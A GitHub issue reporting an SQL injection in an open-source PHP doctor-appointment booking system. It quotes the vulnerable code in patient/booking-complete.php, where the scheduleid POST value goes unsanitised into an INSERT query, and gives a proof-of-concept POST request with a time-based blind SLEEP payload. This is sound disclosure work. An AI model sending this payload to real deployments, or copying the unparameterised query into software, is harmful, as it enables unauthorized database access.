search

HashenUdara / edoc-doctor-appointment-system

This PHP-based open source project is a web application for booking medical appointments. Patients can use the platform to easily schedule appointments with their doctors, saving time and effort. The project's source code is open for anyone to use, modify, and distribute according to their needs.
MIT License
312 stars 120 forks source link

Found a vulnerability #21

Open 0clickjacking0 opened 2 years ago

0clickjacking0 commented 2 years ago

Vulnerability file address

patient/booking-complete.php from line 27,The $scheduleid parameter is controllable, the parameter scheduleid can be passed through post, and the $scheduleid is not protected from sql injection, line 34 $result= $database->query($sql2); causes sql injection

......
......
......
if($_POST){
        if(isset($_POST["booknow"])){
            $apponum=$_POST["apponum"];
            $scheduleid=$_POST["scheduleid"];
            $date=$_POST["date"];
            $scheduleid=$_POST["scheduleid"];
            $sql2="insert into appointment(pid,apponum,scheduleid,appodate) values ($userid,$apponum,$scheduleid,'$date')";
            $result= $database->query($sql2);
            //echo $apponom;
            header("location: appointment.php?action=booking-added&id=".$apponum."&titleget=none");

        }
    }
......
......
......

POC

POST /patient/booking-complete.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=u44s5v8gjuhqo5508209d5nnm1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

booknow=1&apponum=5&scheduleid=1&date=2022-08-05&scheduleid=2 AND (SELECT 7093 FROM (SELECT(SLEEP(5)))RWzN)

Attack results pictures

image-20220806120107012